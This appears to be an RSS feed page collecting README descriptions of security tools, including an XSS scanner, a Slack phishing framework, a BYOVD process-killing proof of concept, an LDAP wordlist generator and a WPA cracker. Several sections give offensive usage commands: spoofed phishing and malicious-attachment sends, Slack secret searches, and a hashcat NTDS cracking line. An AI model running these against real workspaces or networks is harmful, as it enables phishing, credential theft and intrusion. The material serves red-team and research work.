FreshRSS

๐Ÿ”’
โŒ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayYour RSS feeds

X-Recon - A Utility For Detecting Webpage Inputs And Conducting XSS Scans

By: Zion3R

A utility for identifying web page inputs and conducting XSS scanning.


Features:

  • Subdomain Discovery:
  • Retrieves relevant subdomains for the target website and consolidates them into a whitelist. These subdomains can be utilized during the scraping process.

  • Site-wide Link Discovery:

  • Collects all links throughout the website based on the provided whitelist and the specified max_depth.

  • Form and Input Extraction:

  • Identifies all forms and inputs found within the extracted links, generating a JSON output. This JSON output serves as a foundation for leveraging the XSS scanning capability of the tool.

  • XSS Scanning:

  • Once the start recon option returns a custom JSON containing the extracted entries, the X-Recon tool can initiate the XSS vulnerability testing process and furnish you with the desired results!



Note:

The scanning functionality is currently inactive on SPA (Single Page Application) web applications, and we have only tested it on websites developed with PHP, yielding remarkable results. In the future, we plan to incorporate these features into the tool.




Note:

This tool maintains an up-to-date list of file extensions that it skips during the exploration process. The default list includes common file types such as images, stylesheets, and scripts (".css",".js",".mp4",".zip","png",".svg",".jpeg",".webp",".jpg",".gif"). You can customize this list to better suit your needs by editing the setting.json file..

Installation

$ git clone https://github.com/joshkar/X-Recon
$ cd X-Recon
$ python3 -m pip install -r requirements.txt
$ python3 xr.py

Target For Test:

You can use this address in the Get URL section

  http://testphp.vulnweb.com


ROPDump - A Command-Line Tool Designed To Analyze Binary Executables For Potential Return-Oriented Programming (ROP) Gadgets, Buffer Overflow Vulnerabilities, And Memory Leaks

By: Zion3R


ROPDump is a tool for analyzing binary executables to identify potential Return-Oriented Programming (ROP) gadgets, as well as detecting potential buffer overflow and memory leak vulnerabilities.


Features

  • Identifies potential ROP gadgets in binary executables.
  • Detects potential buffer overflow vulnerabilities by analyzing vulnerable functions.
  • Generates exploit templates to make the exploit process faster
  • Identifies potential memory leak vulnerabilities by analyzing memory allocation functions.
  • Can print function names and addresses for further analysis.
  • Supports searching for specific instruction patterns.

Usage

  • <binary>: Path to the binary file for analysis.
  • -s, --search SEARCH: Optional. Search for specific instruction patterns.
  • -f, --functions: Optional. Print function names and addresses.

Examples

  • Analyze a binary without searching for specific instructions:

python3 ropdump.py /path/to/binary

  • Analyze a binary and search for specific instructions:

python3 ropdump.py /path/to/binary -s "pop eax"

  • Analyze a binary and print function names and addresses:

python3 ropdump.py /path/to/binary -f



Startup-SBOM - A Tool To Reverse Engineer And Inspect The RPM And APT Databases To List All The Packages Along With Executables, Service And Versions

By: Zion3R


This is a simple SBOM utility which aims to provide an insider view on which packages are getting executed.

The process and objective is simple we can get a clear perspective view on the packages installed by APT (currently working on implementing this for RPM and other package managers). This is mainly needed to check which all packages are actually being executed.


Installation

The packages needed are mentioned in the requirements.txt file and can be installed using pip:

pip3 install -r requirements.txt

Usage

  • First of all install the packages.
  • Secondly , you need to set up environment variables such as:
    • Mount the image: Currently I am still working on a mechanism to automatically define a mount point and mount different types of images and volumes but its still quite a task for me.
  • Finally run the tool to list all the packages.
Argument Description
--analysis-mode Specifies the mode of operation. Default is static. Choices are static and chroot.
--static-type Specifies the type of analysis for static mode. Required for static mode only. Choices are info and service.
--volume-path Specifies the path to the mounted volume. Default is /mnt.
--save-file Specifies the output file for JSON output.
--info-graphic Specifies whether to generate visual plots for CHROOT analysis. Default is True.
--pkg-mgr Manually specify the package manager or dont add this option for automatic check.
APT:
- Static Info Analysis:
- This command runs the program in static analysis mode, specifically using the Info Directory analysis method.
- It analyzes the packages installed on the mounted volume located at /mnt.
- It saves the output in a JSON file named output.json.
- It generates visual plots for CHROOT analysis.
```bash
python3 main.py --pkg-mgr apt --analysis-mode static --static-type info --volume-path /mnt --save-file output.json
```
  • Static Service Analysis:

  • This command runs the program in static analysis mode, specifically using the Service file analysis method.

  • It analyzes the packages installed on the mounted volume located at /custom_mount.
  • It saves the output in a JSON file named output.json.
  • It does not generate visual plots for CHROOT analysis. bash python3 main.py --pkg-mgr apt --analysis-mode static --static-type service --volume-path /custom_mount --save-file output.json --info-graphic False

  • Chroot analysis with or without Graphic output:

  • This command runs the program in chroot analysis mode.
  • It analyzes the packages installed on the mounted volume located at /mnt.
  • It saves the output in a JSON file named output.json.
  • It generates visual plots for CHROOT analysis.
  • For graphical output keep --info-graphic as True else False bash python3 main.py --pkg-mgr apt --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False

RPM - Static Analysis: - Similar to how its done on apt but there is only one type of static scan avaialable for now. bash python3 main.py --pkg-mgr rpm --analysis-mode static --volume-path /mnt --save-file output.json

  • Chroot analysis with or without Graphic output:
  • Exactly how its done on apt. bash python3 main.py --pkg-mgr rpm --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False

Supporting Images

Currently the tool works on Debian and Red Hat based images I can guarentee the debian outputs but the Red-Hat onces still needs work to be done its not perfect.

I am working on the pacman side of things I am trying to find a relaiable way of accessing the pacman db for static analysis.

Graphical Output Images (Chroot)

APT Chroot

RPM Chroot

Inner Workings

For the workings and process related documentation please read the wiki page: Link

TODO

  • [x] Support for RPM
  • [x] Support for APT
  • [x] Support for Chroot Analysis
  • [x] Support for Versions
  • [x] Support for Chroot Graphical output
  • [x] Support for organized graphical output
  • [ ] Support for Pacman

Ideas and Discussions

Ideas regarding this topic are welcome in the discussions page.



EvilSlackbot - A Slack Bot Phishing Framework For Red Teaming Exercises

By: Zion3R

EvilSlackbot

A Slack Attack Framework for conducting Red Team and phishing exercises within Slack workspaces.

Disclaimer

This tool is intended for Security Professionals only. Do not use this tool against any Slack workspace without explicit permission to test. Use at your own risk.


Background

Thousands of organizations utilize Slack to help their employees communicate, collaborate, and interact. Many of these Slack workspaces install apps or bots that can be used to automate different tasks within Slack. These bots are individually provided permissions that dictate what tasks the bot is permitted to request via the Slack API. To authenticate to the Slack API, each bot is assigned an api token that begins with xoxb or xoxp. More often than not, these tokens are leaked somewhere. When these tokens are exfiltrated during a Red Team exercise, it can be a pain to properly utilize them. Now EvilSlackbot is here to automate and streamline that process. You can use EvilSlackbot to send spoofed Slack messages, phishing links, files, and search for secrets leaked in slack.

Phishing Simulations

In addition to red teaming, EvilSlackbot has also been developed with Slack phishing simulations in mind. To use EvilSlackbot to conduct a Slack phishing exercise, simply create a bot within Slack, give your bot the permissions required for your intended test, and provide EvilSlackbot with a list of emails of employees you would like to test with simulated phishes (Links, files, spoofed messages)

Installation

EvilSlackbot requires python3 and Slackclient

pip3 install slackclient

Usage

usage: EvilSlackbot.py [-h] -t TOKEN [-sP] [-m] [-s] [-a] [-f FILE] [-e EMAIL]
[-cH CHANNEL] [-eL EMAIL_LIST] [-c] [-o OUTFILE] [-cL]

options:
-h, --help show this help message and exit

Required:
-t TOKEN, --token TOKEN
Slack Oauth token

Attacks:
-sP, --spoof Spoof a Slack message, customizing your name, icon, etc
(Requires -e,-eL, or -cH)
-m, --message Send a message as the bot associated with your token
(Requires -e,-eL, or -cH)
-s, --search Search slack for secrets with a keyword
-a, --attach Send a message containing a malicious attachment (Requires -f
and -e,-eL, or -cH)

Arguments:
-f FILE, --file FILE Path to file attachment
-e EMAIL, --email EMAIL
Email of target
-cH CHANNEL, --channel CHANNEL
Target Slack Channel (Do not include #)
-eL EMAIL_LIST, --email_list EMAIL_LIST
Path to list of emails separated by newline
-c, --check Lookup and display the permissions and available attacks
associated with your provided token.
-o OUTFILE, --outfile OUTFILE
Outfile to store search results
-cL, --channel_list List all public Slack channels

Token

To use this tool, you must provide a xoxb or xoxp token.

Required:
-t TOKEN, --token TOKEN (Slack xoxb/xoxp token)
python3 EvilSlackbot.py -t <token>

Attacks

Depending on the permissions associated with your token, there are several attacks that EvilSlackbot can conduct. EvilSlackbot will automatically check what permissions your token has and will display them and any attack that you are able to perform with your given token.

Attacks:
-sP, --spoof Spoof a Slack message, customizing your name, icon, etc (Requires -e,-eL, or -cH)

-m, --message Send a message as the bot associated with your token (Requires -e,-eL, or -cH)

-s, --search Search slack for secrets with a keyword

-a, --attach Send a message containing a malicious attachment (Requires -f and -e,-eL, or -cH)

Spoofed messages (-sP)

With the correct token permissions, EvilSlackbot allows you to send phishing messages while impersonating the botname and bot photo. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

python3 EvilSlackbot.py -t <xoxb token> -sP -e <email address>

python3 EvilSlackbot.py -t <xoxb token> -sP -eL <email list>

python3 EvilSlackbot.py -t <xoxb token> -sP -cH <Channel name>

Phishing Messages (-m)

With the correct token permissions, EvilSlackbot allows you to send phishing messages containing phishing links. What makes this attack different from the Spoofed attack is that this method will send the message as the bot associated with your provided token. You will not be able to choose the name or image of the bot sending your phish. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

python3 EvilSlackbot.py -t <xoxb token> -m -e <email address>

python3 EvilSlackbot.py -t <xoxb token> -m -eL <email list>

python3 EvilSlackbot.py -t <xoxb token> -m -cH <Channel name>

Secret Search (-s)

With the correct token permissions, EvilSlackbot allows you to search Slack for secrets via a keyword search. Right now, this attack requires a xoxp token, as xoxb tokens can not be given the proper permissions to keyword search within Slack. Use the -o argument to write the search results to an outfile.

python3 EvilSlackbot.py -t <xoxp token> -s -o <outfile.txt>

Attachments (-a)

With the correct token permissions, EvilSlackbot allows you to send file attachments. The attachment attack requires a path to the file (-f) you wish to send. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -e <email address>

python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -eL <email list>

python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -cH <Channel name>

Arguments

Arguments:
-f FILE, --file FILE Path to file attachment
-e EMAIL, --email EMAIL Email of target
-cH CHANNEL, --channel CHANNEL Target Slack Channel (Do not include #)
-eL EMAIL_LIST, --email_list EMAIL_LIST Path to list of emails separated by newline
-c, --check Lookup and display the permissions and available attacks associated with your provided token.
-o OUTFILE, --outfile OUTFILE Outfile to store search results
-cL, --channel_list List all public Slack channels

Channel Search

With the correct permissions, EvilSlackbot can search for and list all of the public channels within the Slack workspace. This can help with planning where to send channel messages. Use -o to write the list to an outfile.

python3 EvilSlackbot.py -t <xoxb token> -cL


Reaper - Proof Of Concept On BYOVD Attack

By: Zion3R


Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate, vulnerable driver into a target system, which allows attackers to exploit the driver to perform malicious actions.

Reaper was specifically designed to exploit the vulnerability present in the kprocesshacker.sys driver in version 2.8.0.0, taking advantage of its weaknesses to gain privileged access and control over the target system.

Note: Reaper does not kill the Windows Defender process, as it has a protection, Reaper is a simple proof of concept.


Features

  • Kill process
  • Suspend process

Help

      ____
/ __ \___ ____ _____ ___ _____
/ /_/ / _ \/ __ `/ __ \/ _ \/ ___/
/ _, _/ __/ /_/ / /_/ / __/ /
/_/ |_|\___/\__,_/ .___/\___/_/
/_/

[Coded by MrEmpy]
[v1.0]

Usage: C:\Windows\Temp\Reaper.exe [OPTIONS] [VALUES]
Options:
sp, suspend process
kp, kill process

Values:
PROCESSID process id to suspend/kill

Examples:
Reaper.exe sp 1337
Reaper.exe kp 1337

Demonstration

Install

You can compile it directly from the source code or download it already compiled. You will need Visual Studio 2022 to compile.

Note: The executable and driver must be in the same directory.



Ars0N-Framework - A Modern Framework For Bug Bounty Hunting

By: Zion3R



Howdy! My name is Harrison Richardson, or rs0n (arson) when I want to feel cooler than I really am. The code in this repository started as a small collection of scripts to help automate many of the common Bug Bounty hunting processes I found myself repeating. Over time, I built a simple web application with a MongoDB connection to manage my findings and identify valuable data points. After 5 years of Bug Bounty hunting, both part-time and full-time, I'm finally ready to package this collection of tools into a proper framework.


The Ars0n Framework is designed to provide aspiring Application Security Engineers with all the tools they need to leverage Bug Bounty hunting as a means to learn valuable, real-world AppSec concepts and make ๐Ÿ’ฐ doing it! My goal is to lower the barrier of entry for Bug Bounty hunting by providing easy-to-use automation tools in combination with educational content and how-to guides for a wide range of Web-based and Cloud-based vulnerabilities. In combination with my YouTube content, this framework will help aspiring Application Security Engineers to quickly and easily understand real-world security concepts that directly translate to a high paying career in Cyber Security.

In addition to using this tool for Bug Bounty Hunting, aspiring engineers can also use this Github Repository as a canvas to practice collaborating with other developers! This tool was inspired by Metasploit and designed to be modular in a similar way. Each Script (Ex: wildfire.py or slowburn.py) is basically an algorithm that runs the Modules (Ex: fire-starter.py or fire-scanner.py) in a specific patter for a desired result. Because of this design, the community is free to build new Scripts to solve a specific use-case or Modules to expand the results of these Scripts. By learning the code in this framework and using Github to contribute your own code, aspiring engineers will continue to learn real-world skills that can be applied on the first day of a Security Engineer I position.

My hope is that this modular framework will act as a canvas to help share what I've learned over my career to the next generation of Security Engineers! Trust me, we need all the help we can get!!


Quick Start

Paste this code block into a clean installation of Kali Linux 2023.4 to download, install, and run the latest stable Alpha version of the framework:

sudo apt update && sudo apt-get update
sudo apt -y upgrade && sudo apt-get -y upgrade
wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
rm ars0n-framework-v0.0.2-alpha.tar.gz
cd ars0n-framework
./install.sh

Download Latest Stable ALPHA Version

wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
rm ars0n-framework-v0.0.2-alpha.tar.gz

Install

The Ars0n Framework includes a script that installs all the necessary tools, packages, etc. that are needed to run the framework on a clean installation of Kali Linux 2023.4.

Please note that the only supported installation of this framework is on a clean installation of Kali Linux 2023.3. If you choose to try and run the framework outside of a clean Kali install, I will not be able to help troubleshoot if you have any issues.

./install.sh

This video shows exactly what to expect from a successful installation.

If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts

./install.sh --arm

You will be prompted to enter various API keys and tokens when the installation begins. Entering these is not required to run the core functionality of the framework. If you do not enter these API keys and tokens at the time of installation, simply hit enter at each of the prompts. The keys can be added later to the ~/.keys directory. More information about how to add these keys manually can be found in the Frequently Asked Questions section of this README.

Run the Web Application (Client and Server)

Once the installation is complete, you will be given the option to run the application by entering Y. If you choose not the run the application immediately, or if you need to run the application after a reboot, simply navigate to the root directly and run the run.sh bash script.

./run.sh

If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts

./run.sh --arm

Core Modules

The Ars0n Framework's Core Modules are used to determine the basic scanning logic. Each script is designed to support a specific recon methodology based on what the user is trying to accomplish.

Wildfire

At this time, the Wildfire script is the most widely used Core Module in the Ars0n Framework. The purpose of this module is to allow the user to scan multiple targets that allow for testing on any subdomain discovered by the researcher.

How it works:

  1. The user adds root domains through the Graphical User Interface (GUI) that they wish to scan for hidden subdomains
  2. Wildfire sorts each of these domains based on the last time they were scanned to ensure the domain with the oldest data is scanned first
  3. Wildfire scans each of the domains using the Sub-Modules based on the flags provided by the user.

Most Wildfire scans take between 8 and 48 hours to complete against a single domain if all Sub-Modules are being run. Variations in this timing can be caused by a number of factors, including the target application and the machine running the framework.

Also, please note that most data will not show in the GUI until the scan has completed. It's best to try and run the scan overnight or over a weekend, depending on the number of domains being scanned, and return once the scan has complete to move from Recon to Enumeration.

Running Wildfire:

Graphical User Interface (GUI)

Wildfire can be run from the GUI using the Wildfire button on the dashboard. Once clicked, the front-end will use the checkboxes on the screen to determine what flags should be passed to the scanner.

Please note that running scans from the GUI still has a few bugs and edge cases that haven't been sorted out. If you have any issues, you can simply run the scan form the CLI.

Command Line Interface (CLI)

All Core Modules for The Ars0n Framework are stored in the /toolkit directory. Simply navigate to the directory and run wildfire.py with the necessary flags. At least one Sub-Module flag must be provided.

python3 wildfire.py --start --cloud --scan

Slowburn

Unlike the Wildfire module, which requires the user to identify target domains to scan, the Slowburn module does that work for you. By communicating with APIs for various bug bounty hunting platforms, this script will identify all domains that allow for testing on any discovered subdomain. Once the data has been populated, Slowburn will randomly choose one domain at a time to scan in the same way Wildfire does.

Please note that the Slowburn module is still in development and is not considered part of the stable alpha release. There will likely be bugs and edge cases encountered by the user.

In order for Slowburn to identify targets to scan, it must first be initialized. This initialization step collects the necessary data from various API's and deposits them into a JSON file stored locally. Once this initialization step is complete, Slowburn will automatically begin selecting and scanning one target at a time.

To initalize Slowburn, simply run the following command:

python3 slowburn.py --initialize

Once the data has been collected, it is up to the user whether they want to re-initialize the tool upon the next scan.

Remember that the scope and targets on public bug bounty programs can change frequently. If you choose to run Slowburn without initializing the data, you may be scanning domains that are no longer in scope for the program. It is strongly recommended that Slowburn be re-initialized each time before running.

If you choose not to re-initialize the target data, you can run Slowburn using the previously collected data with the following command:

python3 slowburn.py

Sub-Modules

The Ars0n Framework's Sub-Modules are designed to be leveraged by the Core Modules to divide the Recon & Enumeration phases into specific tasks. The data collected in each Sub-Module is used by the others to expand your picture of the target's attack surface.

Fire-Starter

Fire-Starter is the first step to performing recon against a target domain. The goal of this script is to collect a wealth of information about the attack surface of your target. Once collected, this data will be used by all other Sub-Modules to help the user identify a specific URL that is potentially vulnerable.

Fire-Starter works by running a series of open-source tools to enumerate hidden subdomains, DNS records, and the ASN's to identify where those external entries are hosted. Currently, Fire-Starter works by chaining together the following widely used open-source tools:

  • Amass
  • Sublist3r
  • Assetfinder
  • Get All URL's (GAU)
  • Certificate Transparency Logs (CRT)
  • Subfinder
  • ShuffleDNS
  • GoSpider
  • Subdomainizer

These tools cover a wide range of techniques to identify hidden subdomains, including web scraping, brute force, and crawling to identify links and JavaScript URLs.

Once the scan is complete, the Dashboard will be updated and available to the user.

Most Sub-Modules in The Ars0n Framework requre the data collected from the Fire-Starter module to work. With this in mind, Fire-Starter must be included in the first scan against a target for any usable data to be collected.

Fire-Cloud

Coming soon...

Fire-Scanner

Fire-Scanner uses the results of Fire-Starter and Fire-Cloud to perform Wide-Band Scanning against all subdomains and cloud services that have been discovered from previous scans.

At this stage of development, this script leverages Nuclei almost exclusively for all scanning. Instead of simply running the tool, Fire-Scanner breaks the scan down into specific collections of Nuclei Templates and scans them one by one. This strategy helps ensure the scans are stable and produce consistent results, removes any unnecessary or unsafe scan checks, and produces actionable results.

Troubleshooting

The vast majority of issues installing and/or running the Ars0n Framework are caused by not installing the tool on a clean installation of Kali Linux.

It is important to remember that, at its core, the Ars0n Framework is a collection of automation scripts designed to run existing open-source tools. Each of these tools have their own ways of operating and can experience unexpected behavior if conflicts emerge with any existing service/tool running on the user's system. This complexity is the reason why running The Ars0n Framework should only be run on a clean installation of Kali Linux.

Another very common issue users experience is caused by MongoDB not successfully installing and/or running on their machine. The most common manifestation of this issue is the user is unable to add an initial FQDN and simply sees a broken GUI. If this occurs, please ensure that your machine has the necessary system requirements to run MongoDB. Unfortunately, there is no current solution if you run into this issue.

Frequently Asked Questions

Coming soon...



Headerpwn - A Fuzzer For Finding Anomalies And Analyzing How Servers Respond To Different HTTP Headers

By: Zion3R

Install

To install headerpwn, run the following command:

go install github.com/devanshbatham/headerpwn@v0.0.3

Usage

headerpwn allows you to test various headers on a target URL and analyze the responses. Here's how to use the tool:

  1. Provide the target URL using the -url flag.
  2. Create a file containing the headers you want to test, one header per line. Use the -headers flag to specify the path to this file.

Example usage:

headerpwn -url https://example.com -headers my_headers.txt
  • Format of my_headers.txt should be like below:
Proxy-Authenticate: foobar
Proxy-Authentication-Required: foobar
Proxy-Authorization: foobar
Proxy-Connection: foobar
Proxy-Host: foobar
Proxy-Http: foobar

Proxying requests through Burp Suite:

Follow following steps to proxy requests through Burp Suite:

  • Export Burp's Certificate:

    • In Burp Suite, go to the "Proxy" tab.
    • Under the "Proxy Listeners" section, select the listener that is configured for 127.0.0.1:8080
    • Click on the "Import/ Export CA Certificate" button.
    • In the certificate window, click "Export Certificate" and save the certificate file (e.g., burp.der).
  • Install Burp's Certificate:

    • Install the exported certificate as a trusted certificate on your system. How you do this depends on your operating system.
    • On Windows, you can double-click the .cer file and follow the prompts to install it in the "Trusted Root Certification Authorities" store.
    • On macOS, you can double-click the .cer file and add it to the "Keychain Access" application in the "System" keychain.
    • On Linux, you might need to copy the certificate to a trusted certificate location and configure your system to trust it.

You should be all set:

headerpwn -url https://example.com -headers my_headers.txt -proxy 127.0.0.1:8080

Credits

The headers.txt file is compiled from various sources, including the SecLists">Seclists project. These headers are used for testing purposes and provide a variety of scenarios for analyzing how servers respond to different headers.



LDAPWordlistHarvester - A Tool To Generate A Wordlist From The Information Present In LDAP, In Order To Crack Passwords Of Domain Accounts

By: Zion3R


A tool to generate a wordlist from the information present in LDAP, in order to crack non-random passwords of domain accounts.

ย 

Features

The bigger the domain is, the better the wordlist will be.

  • [x] Creates a wordlist based on the following information found in the LDAP:
  • [x] User: name and sAMAccountName
  • [x] Computer: name and sAMAccountName
  • [x] Groups: name
  • [x] Organizational Units: name
  • [x] Active Directory Sites: name and descriptions
  • [x] All LDAP objects: descriptions
  • [x] Choose wordlist output file name with option --outputfile

Demonstration

To generate a wordlist from the LDAP of the domain domain.local you can use this command:

./LDAPWordlistHarvester.py -d 'domain.local' -u 'Administrator' -p 'P@ssw0rd123!' --dc-ip 192.168.1.101

You will get the following output if using the Python version:

You will get the following output if using the Powershell version:


Cracking passwords

Once you have this wordlist, you should crack your NTDS using hashcat, --loopback and the rule clem9669_large.rule.

./hashcat --hash-type 1000 --potfile-path ./client.potfile ./client.ntds ./wordlist.txt --rules ./clem9669_large.rule --loopback

Usage

$ ./LDAPWordlistHarvester.py -h
LDAPWordlistHarvester.py v1.1 - by @podalirius_

usage: LDAPWordlistHarvester.py [-h] [-v] [-o OUTPUTFILE] --dc-ip ip address [-d DOMAIN] [-u USER] [--ldaps] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key] [-k]

options:
-h, --help show this help message and exit
-v, --verbose Verbose mode. (default: False)
-o OUTPUTFILE, --outputfile OUTPUTFILE
Path to output file of wordlist.

Authentication & connection:
--dc-ip ip address IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted it will use the domain part (FQDN) specified in the identity parameter
-d DOMAIN, --domain DOMAIN
(FQDN) domain to authenticate to
-u USER, --user USER user to authenticate with
--ldaps Use LDAPS instead of LDAP

Credentials:
--no- pass Don't ask for password (useful for -k)
-p PASSWORD, --password PASSWORD
Password to authenticate with
-H [LMHASH:]NTHASH, --hashes [LMHASH:]NTHASH
NT/LM hashes, format is LMhash:NThash
--aes-key hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-k, --kerberos Use Kerberos authentication. Grabs credentials from .ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line


Pyrit - The Famous WPA Precomputed Cracker

By: Zion3R


Pyrit allows you to create massive databases of pre-computed WPA/WPA2-PSK authentication phase in a space-time-tradeoff. By using the computational power of Multi-Core CPUs and other platforms through ATI-Stream,Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security-protocols.

WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre shared key. This master key is derived from a password which the administrating user has to pre-configure e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate following traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home- and small-office-use at the cost of making the protocol vulnerable to brute-force-attacks against it's key negotiation phase; it allows to ultimately reveal the password that protects the network. This vulnerability has to be considered exceptionally disastrous as the protocol allows much of the key derivation to be pre-computed, making simple brute-force-attacks even more alluring to the attacker. For more background see this article on the project's blog (Outdated).


The author does not encourage or support using Pyrit for the infringement of peoples' communication-privacy. The exploration and realization of the technology discussed here motivate as a purpose of their own; this is documented by the open development, strictly sourcecode-based distribution and 'copyleft'-licensing.

Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms including FreeBSD, MacOS X and Linux as operation-system and x86-, alpha-, arm-, hppa-, mips-, powerpc-, s390 and sparc-processors.

Attacking WPA/WPA2 by brute-force boils down to to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10.000 PMKs per second is equivalent to hashing 9,8 gigabyte of data with SHA1 in one second.

These are examples of how multiple computational nodes can access a single storage server over various ways provided by Pyrit:

  • A single storage (e.g. a MySQL-server)
  • A local network that can access the storage-server directly and provide four computational nodes on various levels with only one node actually accessing the storage server itself.
  • Another, untrusted network can access the storage through Pyrit's RPC-interface and provides three computional nodes, two of which actually access the RPC-interface.

What's new

  • Fixed #479 and #481
  • Pyrit CUDA now compiles in OSX with Toolkit 7.5
  • Added use_CUDA and use_OpenCL in config file
  • Improved cores listing and managing
  • limit_ncpus now disables all CPUs when set to value <= 0
  • Improve CCMP packet identification, thanks to yannayl

See CHANGELOG file for a better description.

How to use

Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.

How to participate

You may want to read this wiki-entry if interested in porting Pyrit to new hardware-platform. Contributions or bug reports you should [submit an Issue] (https://github.com/JPaulMora/Pyrit/issues).



SherlockChain - A Streamlined AI Analysis Framework For Solidity, Vyper And Plutus Contracts

By: Zion3R


SherlockChain is a powerful smart contract analysis framework that combines the capabilities of the renowned Slither tool with advanced AI-powered features. Developed by a team of security experts and AI researchers, SherlockChain offers unparalleled insights and vulnerability detection for Solidity, Vyper and Plutus smart contracts.


Key Features

  • Comprehensive Vulnerability Detection: SherlockChain's suite of detectors identifies a wide range of vulnerabilities, including high-impact issues like reentrancy, unprotected upgrades, and more.
  • AI-Powered Analysis: Integrated AI models enhance the accuracy and precision of vulnerability detection, providing developers with actionable insights and recommendations.
  • Seamless Integration: SherlockChain seamlessly integrates with popular development frameworks like Hardhat, Foundry, and Brownie, making it easy to incorporate into your existing workflow.
  • Intuitive Reporting: SherlockChain generates detailed reports with clear explanations and code snippets, helping developers quickly understand and address identified issues.
  • Customizable Analyses: The framework's flexible API allows users to write custom analyses and detectors, tailoring the tool to their specific needs.
  • Continuous Monitoring: SherlockChain can be integrated into your CI/CD pipeline, providing ongoing monitoring and alerting for your smart contract codebase.

Installation

To install SherlockChain, follow these steps:

git clone https://github.com/0xQuantumCoder/SherlockChain.git
cd SherlockChain
pip install .

AI-Powered Features

SherlockChain's AI integration brings several advanced capabilities to the table:

  1. Intelligent Vulnerability Prioritization: AI models analyze the context and potential impact of detected vulnerabilities, providing developers with a prioritized list of issues to address.
  2. Automated Remediation Suggestions: The AI component suggests potential fixes and code modifications to address identified vulnerabilities, accelerating the remediation process.
  3. Proactive Security Auditing: SherlockChain's AI models continuously monitor your codebase, proactively identifying emerging threats and providing early warning signals.
  4. Natural Language Interaction: Users can interact with SherlockChain using natural language, allowing them to query the tool, request specific analyses, and receive detailed responses. he --help command in the SherlockChain framework provides a comprehensive overview of all the available options and features. It includes information on:

  5. Vulnerability Detection: The --detect and --exclude-detectors options allow users to specify which vulnerability detectors to run, including both built-in and AI-powered detectors.

  6. Reporting: The --report-format, --report-output, and various --report-* options control how the analysis results are reported, including the ability to generate reports in different formats (JSON, Markdown, SARIF, etc.).
  7. Filtering: The --filter-* options enable users to filter the reported issues based on severity, impact, confidence, and other criteria.
  8. AI Integration: The --ai-* options allow users to configure and control the AI-powered features of SherlockChain, such as prioritizing high-impact vulnerabilities, enabling specific AI detectors, and managing AI model configurations.
  9. Integration with Development Frameworks: Options like --truffle and --truffle-build-directory facilitate the integration of SherlockChain into popular development frameworks like Truffle.
  10. Miscellaneous Options: Additional options for compiling contracts, listing detectors, and customizing the analysis process.

The --help command provides a detailed explanation of each option, its purpose, and how to use it, making it a valuable resource for users to quickly understand and leverage the full capabilities of the SherlockChain framework.

Example usage:

sherlockchain --help

This will display the comprehensive usage guide for the SherlockChain framework, including all available options and their descriptions.

usage: sherlockchain [-h] [--version] [--solc-remaps SOLC_REMAPS] [--solc-settings SOLC_SETTINGS]
[--solc-version SOLC_VERSION] [--truffle] [--truffle-build-directory TRUFFLE_BUILD_DIRECTORY]
[--truffle-config-file TRUFFLE_CONFIG_FILE] [--compile] [--list-detectors]
[--list-detectors-info] [--detect DETECTORS] [--exclude-detectors EXCLUDE_DETECTORS]
[--print-issues] [--json] [--markdown] [--sarif] [--text] [--zip] [--output OUTPUT]
[--filter-paths FILTER_PATHS] [--filter-paths-exclude FILTER_PATHS_EXCLUDE]
[--filter-contracts FILTER_CONTRACTS] [--filter-contracts-exclude FILTER_CONTRACTS_EXCLUDE]
[--filter-severity FILTER_SEVERITY] [--filter-impact FILTER_IMPACT]
[--filter-confidence FILTER_CONFIDENCE] [--filter-check-suicidal]
[--filter-check-upgradeable] [--f ilter-check-erc20] [--filter-check-erc721]
[--filter-check-reentrancy] [--filter-check-gas-optimization] [--filter-check-code-quality]
[--filter-check-best-practices] [--filter-check-ai-detectors] [--filter-check-all]
[--filter-check-none] [--check-all] [--check-suicidal] [--check-upgradeable]
[--check-erc20] [--check-erc721] [--check-reentrancy] [--check-gas-optimization]
[--check-code-quality] [--check-best-practices] [--check-ai-detectors] [--check-none]
